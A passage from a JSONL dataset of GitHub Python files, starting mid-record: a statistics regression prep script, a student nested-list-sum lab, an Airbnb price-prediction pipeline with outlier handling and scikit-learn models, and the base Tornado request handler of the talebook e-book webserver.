inc_2005, deg=1)\nx = np.linspace(afqt.min(), afqt.max())\nplt.plot(x, a+b*x, c=\"orange\")\nplt.show()\n\nb, a\n\nincome.corr() # no correlation between AFQT and Income2005\n\n\neduc=income[\"Educ\"]\n\nincome.plot(kind=\"scatter\", x=\"Educ\", y=\"Income2005\")\nb, a = np.polyfit(educ, inc_2005, deg=1)\nx = np.linspace(educ.min(), educ.max())\nplt.plot(x, a+b*x, c=\"orange\")\nplt.show()\n\nb, a\n\nincome.corr() # no correlation between Educ and Income2005 either\n\nx1 = np.array([10, 8, 13, 9, 11, 14, 6, 4, 12, 7, 5])\ny1 = np.array([8.04, 6.95, 7.58, 8.81, 8.33, 9.96, 7.24, 4.26, 10.84, 4.82, 5.68])\ny2 = np.array([9.14, 8.14, 8.74, 8.77, 9.26, 8.10, 6.13, 3.10, 9.13, 7.26, 4.74])\ny3 = np.array([7.46, 6.77, 12.74, 7.11, 7.81, 8.84, 6.08, 5.39, 8.15, 6.42, 5.73])\nx4 = np.array([8, 8, 8, 8, 8, 8, 8, 19, 8, 8, 8])\ny4 = np.array([6.58, 5.76, 7.71, 8.84, 8.47, 7.04, 5.25, 12.50, 5.56, 7.91, 6.89])\n\n\nplt.subplot(221)\nplt.scatter(x1, y1)\nb, a = np.polyfit(x1, y1, deg=1)\nx = np.linspace(x1.min(), x1.max())\nplt.plot(x, a+b*x, c=\"violet\")\n\nplt.subplot(222)\nplt.scatter(x1, y2)\nb, a = np.polyfit(x1, y2, deg=1)\nx = np.linspace(x1.min(), x1.max())\nplt.plot(x, a+b*x, c=\"violet\")","repo_name":"christopherchristensen/summaries","sub_path":"stat/archive/prep/sw02/prep-sw02.py","file_name":"prep-sw02.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"39015104470","text":"#!/usr/bin/env python3\n# keattisak wongsathan\n# 600510532\n# Lab 11\n# Problem 4\n# 204111 SEC 001\n\ndef main():\n    list_a = [1, 2, [[2, [[145], 34]], [48, 22]]]\n    print(sum_nested_list(list_a))\n\ndef sum_nested_list(list_a):\n    list_b = []\n    for number in list_a:\n        list_b.append(number)\n\n    j=0\n    while j != len(list_b):\n        if type(list_b[j]) == int:\n            j+=1\n        else:\n            list_b.extend(list_b.pop(j))\n    return sum(list_b)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"picuzzo2/Lab101and103","sub_path":"Lab11/Lab11_4_600510532.py","file_name":"Lab11_4_600510532.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"23493201976","text":"import pandas as pd\nimport pathlib\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport plotly.express as px\nfrom sklearn.metrics import r2_score, mean_squared_error\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.ensemble import RandomForestRegressor, ExtraTreesRegressor\nfrom sklearn.model_selection import train_test_split\n#Importing the dataset\nmeses = {'jan': 1,\n         'fev': 2,\n         'mar': 3,\n         'abr': 4,\n         'mai': 5,\n         'jun': 6,\n         'jul': 7,\n         'ago': 8,\n         'set': 9,\n         'out': 10,\n         'nov': 11,\n         'dez': 12}\ncaminho_bases = pathlib.Path('dataset')\nbase_airbnb = pd.DataFrame()\nfor arquivo in caminho_bases.iterdir():\n    nome_mes = arquivo.name[:3]\n    mes = meses[nome_mes]\n    ano = arquivo.name[-8:]\n    ano = int(ano.replace('.csv', ''))\n    df = pd.read_csv(caminho_bases/arquivo.name, low_memory=False)\n    df['ano'] = ano\n    df['mes'] = mes\n    base_airbnb = base_airbnb.append(df)\n#print(base_airbnb)\n#Preprocessing\n#print(list(base_airbnb.columns))\nbase_airbnb.head(1000).to_csv('primeiros_registros.csv', sep=';')\ncolunas = ['host_response_time', 'host_response_rate', 'host_is_superhost', 'host_listings_count',\n'latitude', 'longitude', 'property_type', 'room_type', 'accommodates', 'bathrooms', 'bedrooms',\n'beds', 'bed_type', 'amenities', 'price', 
'security_deposit', 'cleaning_fee', 'guests_included', \n'extra_people', 'minimum_nights', 'maximum_nights', 'number_of_reviews', 'review_scores_rating', \n'review_scores_accuracy', 'review_scores_cleanliness', 'review_scores_checkin', 'review_scores_communication',\n'review_scores_location', 'review_scores_value', 'instant_bookable', 'is_business_travel_ready',\n'cancellation_policy', 'ano', 'mes']\nbase_airbnb = base_airbnb.loc[:, colunas]\n#print(list(base_airbnb.columns))\n#print(base_airbnb)\n#Handling missing values\nfor coluna in base_airbnb:\n    if base_airbnb[coluna].isnull().sum() > 70000:\n        base_airbnb = base_airbnb.drop(coluna, axis=1)\n#print(base_airbnb.isnull().sum())\nbase_airbnb = base_airbnb.dropna()\n#print(base_airbnb.shape)\n#print(base_airbnb.isnull().sum())\n#Check the data type of each column\n#print(base_airbnb.dtypes)\n#print('-'*60)\n#print(base_airbnb.iloc[0])\n#price\nbase_airbnb['price'] = base_airbnb['price'].str.replace('$', '')\nbase_airbnb['price'] = base_airbnb['price'].str.replace(',', '')\nbase_airbnb['price'] = base_airbnb['price'].astype(np.float32, copy=False)\n#extra people\nbase_airbnb['extra_people'] = base_airbnb['extra_people'].str.replace('$', '')\nbase_airbnb['extra_people'] = base_airbnb['extra_people'].str.replace(',', '')\nbase_airbnb['extra_people'] = base_airbnb['extra_people'].astype(np.float32, copy=False)\n#checking the types\n#print(base_airbnb.dtypes)\n#Exploratory analysis and outlier handling\nplt.figure(figsize=(15, 10))\nsns.heatmap(base_airbnb.corr(), annot=True, cmap='Greens')\n#print(base_airbnb.corr())\n#Function definitions for outlier analysis\ndef limites(coluna):\n    q1 = coluna.quantile(0.25)\n    q3 = coluna.quantile(0.75)\n    amplitude = q3 - q1\n    return q1 - 1.5 * amplitude, q3 + 1.5 * amplitude\n\ndef excluir_outliers(df, nome_coluna):\n    qtde_linhas = df.shape[0]\n    lim_inf, lim_sup = limites(df[nome_coluna])\n    df = df.loc[(df[nome_coluna] >= lim_inf) & (df[nome_coluna] <= lim_sup), :]\n    linhas_removidas = qtde_linhas - df.shape[0]\n    return df, linhas_removidas\n\ndef diagrama_caixa(coluna):\n    fig, (ax1, ax2) = plt.subplots(1, 2)\n    fig.set_size_inches(15, 5)\n    sns.boxplot(x=coluna, ax=ax1)\n    ax2.set_xlim(limites(coluna))\n    sns.boxplot(x=coluna, ax=ax2)\n\ndef histograma(coluna):\n    plt.figure(figsize=(15, 5))\n    sns.distplot(coluna, hist=True)\n\ndef grafico_barra(coluna):\n    plt.figure(figsize=(15, 5))\n    ax = sns.barplot(x=coluna.value_counts().index, y=coluna.value_counts())\n    ax.set_xlim(limites(coluna))\n#price\n#diagrama_caixa(base_airbnb['price'])\n#histograma(base_airbnb['price'])\nbase_airbnb, linhas_removidas = excluir_outliers(base_airbnb, 'price')\nprint('{} rows removed'.format(linhas_removidas))\n#histograma(base_airbnb['price'])\nprint(base_airbnb.shape)\n#extra_people\n#diagrama_caixa(base_airbnb['extra_people'])\n#histograma(base_airbnb['extra_people'])\nbase_airbnb, linhas_removidas = excluir_outliers(base_airbnb, 'extra_people')\nprint('{} rows removed'.format(linhas_removidas))\n#histograma(base_airbnb['extra_people'])\nprint(base_airbnb.shape)\n#host_listings_count\n#diagrama_caixa(base_airbnb['host_listings_count'])\n#grafico_barra(base_airbnb['host_listings_count'])\nbase_airbnb, linhas_removidas = excluir_outliers(base_airbnb, 'host_listings_count')\nprint('{} rows removed'.format(linhas_removidas))\nprint(base_airbnb.shape)\n#accommodates\n#diagrama_caixa(base_airbnb['accommodates'])\n#grafico_barra(base_airbnb['accommodates'])\nbase_airbnb, linhas_removidas = 
excluir_outliers(base_airbnb, 'accommodates')\nprint('{} rows removed'.format(linhas_removidas))\nprint(base_airbnb.shape)\n#bathrooms\nbase_airbnb, linhas_removidas = excluir_outliers(base_airbnb, 'bathrooms')\nprint('{} rows removed'.format(linhas_removidas))\nprint(base_airbnb.shape)\n#bedrooms\nbase_airbnb, linhas_removidas = excluir_outliers(base_airbnb, 'bedrooms')\nprint('{} rows removed'.format(linhas_removidas))\nprint(base_airbnb.shape)\n#beds\nbase_airbnb, linhas_removidas = excluir_outliers(base_airbnb, 'beds')\nprint('{} rows removed'.format(linhas_removidas))\nprint(base_airbnb.shape)\n#guests_included\nbase_airbnb = base_airbnb.drop('guests_included', axis = 1)\nprint(base_airbnb.shape)\n#minimum_nights\nbase_airbnb, linhas_removidas = excluir_outliers(base_airbnb, 'minimum_nights')\nprint('{} rows removed'.format(linhas_removidas))\nprint(base_airbnb.shape)\n#maximum_nights\nbase_airbnb = base_airbnb.drop('maximum_nights', axis = 1)\nprint(base_airbnb.shape)\n#number_of_reviews\nbase_airbnb = base_airbnb.drop('number_of_reviews', axis = 1)\nprint(base_airbnb.shape)\n#Handling text-valued columns\n#print(base_airbnb['property_type'].value_counts())\ntabela_tipos_casa = base_airbnb['property_type'].value_counts()\ncolunas_agrupar = []\nfor tipo in tabela_tipos_casa.index:\n    if tabela_tipos_casa[tipo] < 500:\n        colunas_agrupar.append(tipo)\nprint(colunas_agrupar)\nfor tipo in colunas_agrupar:\n    base_airbnb.loc[base_airbnb['property_type']==tipo, 'property_type'] = 'Outros'\nprint(base_airbnb['property_type'].value_counts())\n#room_type\nprint(base_airbnb['room_type'].value_counts())\n#bed_type\nprint(base_airbnb['bed_type'].value_counts())\n# grouping bed_type categories\ntabela_bed = base_airbnb['bed_type'].value_counts()\ncolunas_agrupar = []\nfor tipo in tabela_bed.index:\n    if tabela_bed[tipo] < 10000:\n        colunas_agrupar.append(tipo)\nprint(colunas_agrupar)\nfor tipo in colunas_agrupar:\n    base_airbnb.loc[base_airbnb['bed_type']==tipo, 'bed_type'] = 'Outros'\nprint(base_airbnb['bed_type'].value_counts())\n#cancellation_policy\nprint(base_airbnb['cancellation_policy'].value_counts())\n# grouping cancellation_policy categories\ntabela_cancellation = base_airbnb['cancellation_policy'].value_counts()\ncolunas_agrupar = []\nfor tipo in tabela_cancellation.index:\n    if tabela_cancellation[tipo] < 10000:\n        colunas_agrupar.append(tipo)\nprint(colunas_agrupar)\nfor tipo in colunas_agrupar:\n    base_airbnb.loc[base_airbnb['cancellation_policy']==tipo, 'cancellation_policy'] = 'Outros'\nprint(base_airbnb['cancellation_policy'].value_counts())\n#amenities\nprint(base_airbnb['amenities'].iloc[1].split(','))\nprint(len(base_airbnb['amenities'].iloc[1].split(',')))\nbase_airbnb['n_amenities'] = base_airbnb['amenities'].str.split(',').apply(len)\nbase_airbnb = base_airbnb.drop('amenities', axis = 1)\nprint(base_airbnb.shape)\nbase_airbnb, linhas_removidas = excluir_outliers(base_airbnb, 'n_amenities')\nprint('{} rows removed'.format(linhas_removidas))\nprint(base_airbnb.shape)\n#Property map visualization\namostra = base_airbnb.sample(n=5000)\ncentro_mapa = {'lat':amostra.latitude.mean(), 'lon':amostra.longitude.mean()}\nmapa = px.density_mapbox(amostra, lat='latitude', lon='longitude',z='price', radius=2.5,\n                        center=centro_mapa, zoom=10,\n                        mapbox_style='stamen-terrain')\n#mapa.show()\n#Encoding\ncolunas_tf = ['host_is_superhost', 'instant_bookable', 'is_business_travel_ready']\nbase_airbnb_cod = base_airbnb.copy()\nfor coluna in 
colunas_tf:\n    base_airbnb_cod.loc[base_airbnb_cod[coluna]=='t', coluna] = 1\n    base_airbnb_cod.loc[base_airbnb_cod[coluna]=='f', coluna] = 0\ncolunas_categorias = ['property_type', 'room_type', 'bed_type', 'cancellation_policy']\nbase_airbnb_cod = pd.get_dummies(data=base_airbnb_cod, columns=colunas_categorias)\nprint(base_airbnb_cod.head())\n#Prediction model\ndef avaliar_modelo(nome_modelo, y_test, previsao):\n    r2 = r2_score(y_test, previsao)\n    RSME = np.sqrt(mean_squared_error(y_test, previsao))\n    return f'Model {nome_modelo}:\\nR2:{r2:.2%}\\nRSME:{RSME:.2f}'\n\nmodelo_rf = RandomForestRegressor()\nmodelo_lr = LinearRegression()\nmodelo_et = ExtraTreesRegressor()\nmodelos = {\n    'RandomForest': modelo_rf,\n    'LinearRegression': modelo_lr,\n    'ExtraTreesRegressor': modelo_et\n}\ny = base_airbnb_cod['price']\nx = base_airbnb_cod.drop('price', axis = 1)\nX_train, X_test, y_train, y_test = train_test_split(x, y, random_state=10)\nfor nome_modelo, modelo in modelos.items():\n    #train\n    modelo.fit(X_train, y_train)\n    #test\n    previsao = modelo.predict(X_test)\n    print(avaliar_modelo(nome_modelo, y_test, previsao))","repo_name":"gitandlucsil/data_analytics","sub_path":"intensivao/aula3/aula3.py","file_name":"aula3.py","file_ext":"py","file_size_in_byte":9581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"33770621291","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\n\nimport base64\nimport datetime\nimport hashlib\nimport logging\nimport os\nimport time\nfrom collections import defaultdict\nfrom gettext import gettext as _\n\nfrom jinja2 import Environment, FileSystemLoader\nfrom sqlalchemy import func as sql_func\nfrom tornado import web\n\nfrom webserver import loader, utils\n\n# import social_tornado.handlers\nfrom webserver.models import Item, Message, Reader\n\nmessages = defaultdict(list)\nCONF = loader.get_settings()\n\n\ndef day_format(value, format=\"%Y-%m-%d\"):\n    try:\n        return value.strftime(format)\n    except:\n        return \"1990-01-01\"\n\n\ndef website_format(value):\n    links = []\n    for link in value.split(\";\"):\n        if link.startswith(\"douban://\"):\n            douban_id = link.split(\"//\")[-1]\n            links.append(u'<a href=\"https://book.douban.com/subject/%s/\">豆瓣</a>' % douban_id)\n        elif link.startswith(\"isbn://\"):\n            douban_id = link.split(\"//\")[-1]\n            links.append(u'<a href=\"https://douban.com/isbn/%s/\">豆瓣</a>' % douban_id)\n        elif link.startswith(\"http://\"):\n            links.append(u'<a href=\"%s\">参考链接</a>' % link)\n    return \";\".join(links)\n\n\ndef js(func):\n    def do(self, *args, **kwargs):\n        try:\n            rsp = func(self, *args, **kwargs)\n            rsp[\"msg\"] = rsp.get(\"msg\", \"\")\n        except Exception as e:\n            import traceback\n\n            logging.error(traceback.format_exc())\n            msg = 'Exception:<br><pre>%s</pre>' % traceback.format_exc()\n
            rsp = {\"err\": \"exception\", \"msg\": msg}\n            if isinstance(e, web.Finish):\n                rsp = \"\"\n        origin = self.request.headers.get(\"origin\", \"*\")\n        self.set_header(\"Access-Control-Allow-Origin\", origin)\n        self.set_header(\"Access-Control-Allow-Credentials\", \"true\")\n        self.set_header(\"Cache-Control\", \"max-age=0\")\n        self.write(rsp)\n        self.finish()\n        return\n\n    return do\n\n\ndef auth(func):\n    def do(self, *args, **kwargs):\n        if not self.current_user:\n            return {\"err\": \"user.need_login\", \"msg\": _(u\"请先登录\")}\n        return func(self, *args, **kwargs)\n\n    return do\n\n\ndef is_admin(func):\n    def do(self, *args, **kwargs):\n        if not self.current_user:\n            return {\"err\": \"user.need_login\", \"msg\": _(u\"请先登录\")}\n        if not self.admin_user:\n            return {\"err\": \"permission.not_admin\", \"msg\": _(u\"当前用户非管理员\")}\n        return func(self, *args, **kwargs)\n\n    return do\n\n\nclass BaseHandler(web.RequestHandler):\n    _path_to_env = {}\n\n    def get_secure_cookie(self, key):\n        if not self.cookies_cache.get(key, \"\"):\n            self.cookies_cache[key] = super(BaseHandler, self).get_secure_cookie(key)\n        return self.cookies_cache[key]\n\n    def set_secure_cookie(self, key, val):\n        self.cookies_cache[key] = val\n        super(BaseHandler, self).set_secure_cookie(key, val)\n        return None\n\n    def head(self, *args, **kwargs):\n        return self.get(*args, **kwargs)\n\n    def mark_invited(self):\n        self.set_secure_cookie(\"invited\", str(int(time.time())))\n\n    def need_invited(self):\n        return CONF[\"INVITE_MODE\"] is True\n\n    def invited_code_is_ok(self):\n        t = self.get_secure_cookie(\"invited\")\n        if t and int(float(t)) > int(time.time()) - 7 * 86400:\n            return True\n        return False\n\n    def process_auth_header(self):\n        auth_header = self.request.headers.get(\"Authorization\", \"\")\n        if not auth_header.startswith(\"Basic \"):\n            return False\n        auth_decoded = base64.decodebytes(auth_header[6:].encode(\"ascii\")).decode(\"UTF-8\")\n        username, password = auth_decoded.split(\":\", 2)\n        user = self.session.query(Reader).filter(Reader.username == username).first()\n        if not user:\n            return False\n        if user.get_secure_password(password) != str(user.password):\n            return False\n        self.mark_invited()\n        self.login_user(user)\n        return True\n\n    def send_error_of_not_invited(self):\n        self.write({\"err\": \"not_invited\"})\n        self.set_status(200)\n        raise web.Finish()\n\n    def should_be_invited(self):\n        if self.need_invited():\n            if not self.invited_code_is_ok():\n                return self.send_error_of_not_invited()\n\n    def should_be_installed(self):\n        if CONF.get(\"installed\", None) is False:\n            self.write({\"err\": \"not_installed\"})\n            self.set_status(200)\n            raise web.Finish()\n\n    def set_hosts(self):\n        # site_url is the full absolute URL (protocol + host), used for emails etc.\n        host = self.request.headers.get(\"X-Forwarded-Host\", self.request.host)\n        self.site_url = self.request.protocol + \"://\" + host\n\n        # By default, on-site resources are referenced with relative paths\n        self.api_url = \"\"  # base URL for dynamic API requests\n        self.cdn_url = \"\"  # cacheable resources: images, files\n\n        # If static_host is configured, switch to absolute URLs instead\n        if CONF[\"static_host\"]:\n            self.api_url = self.request.protocol + \"://\" + host\n            self.cdn_url = self.request.protocol + \"://\" + CONF[\"static_host\"]\n\n    def prepare(self):\n        self.set_hosts()\n        self.set_i18n()\n        self.process_auth_header()\n        self.should_be_installed()\n        self.should_be_invited()\n\n    def set_i18n(self):\n        return\n        # TODO set correct language package\n        # import gettext\n        # accept = self.request.headers.get(\"Accept-Language\", \"\")\n        # langs = [v.strip().split(\";\")[0] for v in accept.split(\",\") if v.strip()]\n        # logging.debug(\"choose 
lang: %s\" % langs)\n # if not langs: langs = [\"zh_CN\"]\n # lang = gettext.translation('messages', localedir=CONF['i18n_path'], languages=langs, fallback=True)\n # lang.install(unicode=True)\n\n def initialize(self):\n ScopedSession = self.settings[\"ScopedSession\"]\n self.session = ScopedSession() # new sql session\n self.db = self.settings[\"legacy\"]\n self.cache = self.db.new_api\n self.build_time = self.settings[\"build_time\"]\n self.default_cover = self.settings[\"default_cover\"]\n self.admin_user = None\n self.cookies_cache = {}\n\n def on_finish(self):\n ScopedSession = self.settings[\"ScopedSession\"]\n ScopedSession.remove()\n\n def static_url(self, path, **kwargs):\n if path.endswith(\"/\"):\n prefix = self.settings.get(\"static_url_prefix\", \"/static/\")\n return self.cdn_url + prefix + path\n else:\n return self.cdn_url + super(BaseHandler, self).static_url(path, **kwargs)\n\n def user_id(self):\n login_time = self.get_secure_cookie(\"lt\")\n if not login_time or int(login_time) < int(time.time()) - 7 * 86400:\n return None\n uid = self.get_secure_cookie(\"user_id\")\n return int(uid) if uid.isdigit() else None\n\n def get_current_user(self):\n user_id = self.user_id()\n if user_id:\n user_id = int(user_id)\n user = self.session.query(Reader).get(user_id) if user_id else None\n logging.debug(\"Query User(%s) = %s\" % (user_id, user))\n\n admin_id = self.get_secure_cookie(\"admin_id\")\n if admin_id:\n self.admin_user = self.session.query(Reader).get(int(admin_id))\n elif user and user.is_admin():\n self.admin_user = user\n return user\n\n def is_admin(self):\n if self.admin_user:\n return True\n if not self.current_user:\n return False\n return self.current_user.is_admin()\n\n def login_user(self, user):\n logging.info(\"LOGIN: %s - %d - %s\" % (self.request.remote_ip, user.id, user.username))\n self.set_secure_cookie(\"user_id\", str(user.id))\n self.set_secure_cookie(\"lt\", str(int(time.time())))\n user.access_time = datetime.datetime.now()\n user.extra[\"login_ip\"] = self.request.remote_ip\n user.save()\n\n def add_msg(self, status, msg):\n m = Message(self.user_id(), status, msg)\n if m.reader_id:\n m.save()\n\n def pop_messages(self):\n if not self.current_user:\n return []\n messages = self.current_user.messages\n for m in messages:\n self.session.delete(m)\n self.session.commit()\n return messages\n\n def user_history(self, action, book):\n if not self.user_id():\n return\n extra = self.current_user.extra\n history = extra.get(action, [])\n for val in history[:12]:\n if val[\"id\"] == book[\"id\"]:\n return\n val = {\n \"id\": book[\"id\"],\n \"title\": book[\"title\"],\n \"timestamp\": int(time.time()),\n }\n history.insert(0, val)\n # an item is about 100Byte, sqlite's max length is 32KB\n # we have five type of history, so make a average limit of max history\n ITEM_COUNT_LIMIT = 60 # = 32KB/100B/5\n extra[action] = history[:ITEM_COUNT_LIMIT]\n user = self.current_user\n user.extra.update(extra)\n user.save()\n\n def last_modified(self, updated):\n \"\"\"\n Generates a locale independent, english timestamp from a datetime\n object\n \"\"\"\n lm = updated.strftime(\"day, %d month %Y %H:%M:%S GMT\")\n day = {0: \"Sun\", 1: \"Mon\", 2: \"Tue\", 3: \"Wed\", 4: \"Thu\", 5: \"Fri\", 6: \"Sat\"}\n lm = lm.replace(\"day\", day[int(updated.strftime(\"%w\"))])\n month = {\n 1: \"Jan\",\n 2: \"Feb\",\n 3: \"Mar\",\n 4: \"Apr\",\n 5: \"May\",\n 6: \"Jun\",\n 7: \"Jul\",\n 8: \"Aug\",\n 9: \"Sep\",\n 10: \"Oct\",\n 11: \"Nov\",\n 12: \"Dec\",\n }\n return 
lm.replace(\"month\", month[updated.month])\n\n def sort(self, items, field, order):\n from calibre.library.caches import SortKey, SortKeyGenerator\n\n class CSSortKeyGenerator(SortKeyGenerator):\n def __init__(self, fields, fm, db_prefs):\n SortKeyGenerator.__init__(self, fields, fm, None, db_prefs)\n\n def __call__(self, record):\n values = tuple(self.itervals(record))\n return SortKey(self.orders, values)\n\n field = self.db.data.sanitize_sort_field_name(field)\n if field not in self.db.field_metadata.sortable_field_keys():\n raise web.HTTPError(400, \"%s is not a valid sort field\" % field)\n\n keyg = CSSortKeyGenerator([(field, order)], self.db.field_metadata, self.db.prefs)\n items.sort(key=keyg)\n\n def get_template_path(self):\n \"\"\"获取模板路径\"\"\"\n return CONF.get(\"resource_path\", \"templates\")\n\n def create_template_loader(self, template_path):\n \"\"\"根据template_path创建相对应的Jinja2 Environment\"\"\"\n temp_path = template_path\n if isinstance(template_path, (list, tuple)):\n temp_path = template_path[0]\n\n env = BaseHandler._path_to_env.get(temp_path)\n if not env:\n logging.debug(\"create template env for [%s]\" % template_path)\n _loader = FileSystemLoader(template_path)\n env = Environment(loader=_loader)\n env.filters[\"day\"] = day_format\n env.filters[\"website\"] = website_format\n # env.globals['gettext'] = _\n BaseHandler._path_to_env[temp_path] = env\n return env\n\n def render_string(self, template_name, **kwargs):\n \"\"\"使用Jinja2模板引擎\"\"\"\n env = self.create_template_loader(self.get_template_path())\n t = env.get_template(template_name)\n namespace = self.get_template_namespace()\n namespace.update(kwargs)\n return t.render(**namespace)\n\n def html_page(self, template, *args, **kwargs):\n self.set_header(\"Cache-Control\", \"max-age=0\")\n request = self.request\n request.user = self.current_user\n request.user_extra = {}\n request.admin_user = self.admin_user\n if request.user:\n request.user_extra = self.current_user.extra\n if not request.user.avatar:\n request.user.avatar = \"//tva1.sinaimg.cn/default/images/default_avatar_male_50.gif\"\n else:\n request.user.avatar = request.user.avatar.replace(\"http://\", \"//\")\n\n last_week = datetime.datetime.now() - datetime.timedelta(days=7)\n page_vars = {\n \"db\": self.db,\n \"messages\": self.pop_messages(),\n \"count_all_users\": self.session.query(sql_func.count(Reader.id)).scalar(),\n \"count_hot_users\": self.session.query(sql_func.count(Reader.id))\n .filter(Reader.access_time > last_week)\n .scalar(),\n \"IMG\": self.cdn_url,\n \"SITE_TITLE\": CONF[\"site_title\"],\n }\n vals = dict(*args, **kwargs)\n vals.update(page_vars)\n vals.update(vars())\n del vals[\"self\"]\n self.write(self.render_string(template, **vals))\n\n def get_book(self, book_id):\n books = self.get_books(ids=[int(book_id)])\n if not books:\n self.write({\"err\": \"not_found\", \"msg\": _(u\"抱歉,这本书不存在\")})\n self.set_status(200)\n raise web.Finish()\n return books[0]\n\n def is_book_owner(self, book_id, user_id):\n auto = int(CONF.get(\"auto_login\", 0))\n if auto:\n return True\n\n query = self.session.query(Item)\n query = query.filter(Item.book_id == book_id)\n query = query.filter(Item.collector_id == user_id)\n return query.count() > 0\n\n def get_books(self, *args, **kwargs):\n _ts = time.time()\n books = self.db.get_data_as_dict(*args, **kwargs)\n logging.debug(\n \"[%5d ms] select books from library (count = %d)\" % (int(1000 * (time.time() - _ts)), len(books))\n )\n\n item = Item()\n empty_item = item.to_dict()\n 
empty_item[\"collector\"] = self.session.query(Reader).order_by(Reader.id).first()\n ids = [book[\"id\"] for book in books]\n items = self.session.query(Item).filter(Item.book_id.in_(ids)).all() if ids else []\n maps = {}\n for b in items:\n d = b.to_dict()\n c = b.collector.to_dict() if b.collector else empty_item[\"collector\"]\n d[\"collector\"] = c\n maps[b.book_id] = d\n for book in books:\n book.update(maps.get(book[\"id\"], empty_item))\n logging.debug(\n \"[%5d ms] select books from database (count = %d)\" % (int(1000 * (time.time() - _ts)), len(books))\n )\n return books\n\n def count_increase(self, book_id, **kwargs):\n try:\n item = self.session.query(Item).filter(Item.book_id == book_id).one()\n except:\n item = Item()\n item.book_id = book_id\n\n item.count_guest += kwargs.get(\"count_guest\", 0)\n item.count_visit += kwargs.get(\"count_visit\", 0)\n item.count_download += kwargs.get(\"count_download\", 0)\n item.save()\n\n def search_for_books(self, query):\n self.search_restriction = \"\"\n return self.db.search_getting_ids(\n (query or \"\").strip(),\n self.search_restriction,\n sort_results=False,\n use_virtual_library=False,\n )\n\n def all_tags_with_count(self):\n sql = \"\"\"SELECT tags.name, count(distinct book) as count\n FROM tags left join books_tags_link on tags.id = books_tags_link.tag\n group by tags.id\"\"\"\n tags = dict((i[0], i[1]) for i in self.cache.backend.conn.get(sql))\n return tags\n\n def get_category_with_count(self, field):\n table = field if field in [\"series\"] else field + \"s\"\n name_column = \"A.rating as name\" if field in [\"rating\"] else \"A.name\"\n args = {\"table\": table, \"field\": field, \"name_column\": name_column}\n sql = (\n \"\"\"SELECT A.id, %(name_column)s, count(distinct book) as count\n FROM %(table)s as A left join books_%(table)s_link as B\n on A.id = B.%(field)s group by A.id\"\"\"\n % args\n )\n logging.debug(sql)\n rows = self.cache.backend.conn.get(sql)\n items = [{\"id\": a, \"name\": b, \"count\": c} for a, b, c in rows]\n return items\n\n def books_by_id(self):\n sql = \"SELECT id FROM books order by id desc\"\n ids = [v[0] for v in self.cache.backend.conn.get(sql)]\n return ids\n\n def get_argument_start(self):\n start = self.get_argument(\"start\", 0)\n try:\n start = int(start)\n except:\n start = 0\n return max(0, start)\n\n def get_path_progress(self, book_id):\n return os.path.join(CONF[\"progress_path\"], \"progress-%s.log\" % book_id)\n\n def create_mail(self, sender, to, subject, body, attachment_data, attachment_name):\n from email.header import Header\n from email.mime.application import MIMEApplication\n from email.mime.multipart import MIMEMultipart\n from email.mime.text import MIMEText\n from email.utils import formatdate\n\n mail = MIMEMultipart()\n mail[\"From\"] = sender\n mail[\"To\"] = to\n mail[\"Subject\"] = Header(subject, \"utf-8\")\n mail[\"Date\"] = formatdate(localtime=True)\n mail[\"Message-ID\"] = \"\" % hashlib.md5(mail.as_string().encode(\"UTF-8\")).hexdigest()\n mail.preamble = \"You will not see this in a MIME-aware mail reader.\\n\"\n\n if body is not None:\n msg = MIMEText(body, \"plain\", \"utf-8\")\n mail.attach(msg)\n\n if attachment_data is not None:\n name = Header(attachment_name, \"utf-8\").encode()\n msg = MIMEApplication(attachment_data, \"octet-stream\", charset=\"utf-8\", name=name)\n msg.add_header(\"Content-Disposition\", \"attachment\", filename=name)\n mail.attach(msg)\n return mail.as_string()\n\n def mail(self, sender, to, subject, body, attachment_data=None, 
attachment_name=None, **kwargs):\n        from calibre.utils.smtp import sendmail\n\n        smtp_port = 465\n        relay = kwargs.get(\"relay\", CONF[\"smtp_server\"])\n        if ':' in relay:\n            relay, smtp_port = relay.split(\":\")\n        username = kwargs.get(\"username\", CONF[\"smtp_username\"])\n        password = kwargs.get(\"password\", CONF[\"smtp_password\"])\n        mail = self.create_mail(sender, to, subject, body, attachment_data, attachment_name)\n        sendmail(\n            mail,\n            from_=sender,\n            to=[to],\n            timeout=20,\n            port=int(smtp_port),\n            encryption=\"SSL\",\n            relay=relay,\n            username=username,\n            password=password,\n        )\n\n\nclass ListHandler(BaseHandler):\n    def get_item_books(self, category, name):\n        books = []\n        item_id = self.cache.get_item_id(category, name)\n        if item_id:\n            ids = self.db.get_books_for_category(category, item_id)\n            books = self.db.get_data_as_dict(ids=ids)\n        return books\n\n    def do_sort(self, items, field, ascending):\n        items.sort(key=lambda x: x[field], reverse=not ascending)\n\n    def sort_books(self, items, field):\n        fm = self.db.field_metadata\n        keys = frozenset(fm.sortable_field_keys())\n        if field in keys:\n            ascending = fm[field][\"datatype\"] not in (\n                \"rating\",\n                \"datetime\",\n                \"series\",\n                \"timestamp\",\n            )\n            self.do_sort(items, field, ascending)\n        else:\n            self.do_sort(items, \"id\", False)\n        return None\n\n    @js\n    def render_book_list(self, all_books, ids=None, title=None, sort_by_id=False):\n        start = self.get_argument_start()\n        try:\n            size = int(self.get_argument(\"size\"))\n        except:\n            size = 60\n        delta = min(max(size, 60), 100)\n\n        if ids:\n            ids = list(ids)\n            count = len(ids)\n            books = self.get_books(ids=ids[start : start + delta])\n            if sort_by_id:\n                # Normalize: sort by id in descending order.\n                self.do_sort(books, \"id\", False)\n        else:\n            count = len(all_books)\n            books = all_books[start : start + delta]\n        return {\n            \"err\": \"ok\",\n            \"title\": title,\n            \"total\": count,\n            \"books\": [self.fmt(b) for b in books],\n        }\n\n    def fmt(self, b):\n        return utils.BookFormatter(self, b).format()\n","repo_name":"talebook/talebook","sub_path":"webserver/handlers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":20683,"program_lang":"python","lang":"en","doc_type":"code","stars":1831,"dataset":"github-code","pt":"38"} 